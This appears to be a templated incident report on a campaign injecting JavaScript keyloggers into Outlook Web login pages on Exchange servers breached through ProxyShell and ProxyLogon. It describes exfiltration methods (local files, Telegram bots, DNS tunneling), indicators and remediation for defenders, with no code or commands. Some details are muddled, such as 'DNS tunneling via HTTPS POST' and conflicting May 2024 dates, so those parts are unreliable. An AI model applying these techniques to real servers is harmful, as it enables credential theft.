Full Report
Unidentified threat actors have been observed targeting publicly exposed Microsoft Exchange servers to inject malicious code into the login pages that harvest their credentials. Positive Technologies, in a new analysis published last week, said it identified two different kinds of keylogger code written in JavaScript on the Outlook login page - Those that save collected data to a local file
Analysis Summary
# Incident Report: Microsoft Exchange Credential Harvesting Campaign
## Executive Summary
Unidentified actors have been systematically targeting publicly exposed Microsoft Exchange servers across 26 countries, exploiting known vulnerabilities (like ProxyShell) to inject JavaScript keyloggers into the Outlook web login pages. This campaign, a continuation of activity first noted in May 2024, aims to steal user credentials. The resulting impact includes credential theft and potential downstream compromise, with response actions typically involving patching the exploited vulnerabilities and cleaning the compromised web pages.
## Incident Details
- Discovery Date: Analysis published in the week leading up to June 24, 2025 (Positive Technologies analysis published "last week").
- Incident Date: Evidence suggests compromises dating back to 2021, with the current observed campaign continuing from May 2024.
- Affected Organization: Over 70 organizations globally, including government agencies, banks, IT companies, and educational institutions.
- Sector: Mixed (Government, Financial, IT, Education).
- Geography: 26 countries worldwide.
## Timeline of Events
### Initial Access
- Date/Time: Ongoing since at least 2021, with recent activity observed leading up to May 2024.
- Vector: Exploitation of known vulnerabilities in Microsoft Exchange Server, specifically mentioning ProxyLogon and ProxyShell related vulnerabilities (e.g., CVE-2021-34523).
- Details: Attackers exploit flaws to achieve persistent access and inject code onto the Outlook login page.
### Lateral Movement
- Details: Not explicitly detailed, but the acquisition of high-value credentials (from keylogging) strongly implies subsequent lateral movement to access sensitive data or internal resources.
### Data Exfiltration/Impact
- Details: Stolen credentials from the login form. Two primary methods identified:
1. **Local File Storage:** Data saved to a local file accessible over the internet on the compromised server. This variant may also collect cookies, User-Agent strings, and timestamps.
2. **Immediate Exfiltration:** Data sent immediately to an external server, potentially via an XHR request relayed to a handler function on the compromised Exchange server. Advanced variants used Telegram bots or DNS tunneling via HTTPS POST requests to evade defenses.
### Detection & Response
- Detection: Identified by Positive Technologies through analysis of deployed malicious JavaScript on Exchange login pages.
- Response: Actions focus on patching the underlying vulnerabilities and removing the malicious code.
## Attack Methodology
- Initial Access: Exploitation of Microsoft Exchange Server RCE/Bypass vulnerabilities (e.g., ProxyShell, ProxyLogon).
- Persistence: Maintaining injection of JavaScript keylogger code onto the Outlook authentication form.
- Privilege Escalation: Not explicitly detailed, but RCE vulnerabilities were leveraged for initial access.
- Defense Evasion: One keylogger variant avoids outbound traffic by saving data locally. Another uses DNS tunneling and encoded API headers (via Telegram bot or HTTPS POST) to exfiltrate data stealthily.
- Credential Access: Keylogging via malicious JavaScript monitoring the authentication form input.
- Discovery: Not explicitly detailed, assumed standard internal reconnaissance post-exploitation.
- Lateral Movement: Implied through credential harvesting to access other network resources.
- Collection: Harvesting login credentials, user cookies, User-Agent strings, and timestamps (in some variants).
- Exfiltration: XHR requests to a handler page, direct egress to a Telegram bot API, or DNS tunneling.
- Impact: Credential theft, potential loss of sensitive organizational data.
## Impact Assessment
- Financial: Not specified, but likely significant due to the targeting of banks and government organizations.
- Data Breach: User credentials for Outlook/Exchange accounts were successfully harvested.
- Operational: Potential disruption resulting from compromised accounts and subsequent secondary attacks.
- Reputational: High, given the targeting of government and financial entities.
## Indicators of Compromise
- Network Indicators (Defanged): XHR requests to a specific page on the *compromised Exchange Server*; HTTPS POST requests utilizing **\***APIKey**\*** and **\***AuthToken**\*** headers pointing to a Telegram bot instance.
- File Indicators: Malicious JavaScript embedded within Outlook login pages.
- Behavioral Indicators: Unusual file creation on the Exchange server storing authentication payloads; non-standard DNS queries indicative of DNS tunneling.
## Response Actions
- Containment: Patching the underlying Exchange Server vulnerabilities (CVEs listed). For local storage variants, deleting the persistent malicious script from the web pages.
- Eradication: Removing the keylogging mechanism from the affected Exchange server files.
- Recovery: Forcing password resets for all potentially compromised accounts, reviewing access logs for evidence of lateral movement.
## Lessons Learned
- Known vulnerabilities in widely deployed software (like Exchange Server) remain high-value entry points for prolonged, multi-year campaigns.
- Web application security must account for injection into client-side code (JavaScript) used in authentication flows.
- Attackers are employing increasingly novel exfiltration techniques (e.g., DNS tunneling, leveraging third-party services like Telegram) to bypass egress filtering.
## Recommendations
- Immediately patch all known Microsoft Exchange vulnerabilities, prioritizing RCEs (ProxyLogon/ProxyShell).
- Implement egress filtering and monitoring to detect anomalous traffic patterns, especially DNS tunneling and connections to known malicious external services (like Telegram APIs).
- Conduct comprehensive security audits of the login pages of all critical web applications to scan for embedded, undocumented JavaScript capable of harvesting credentials.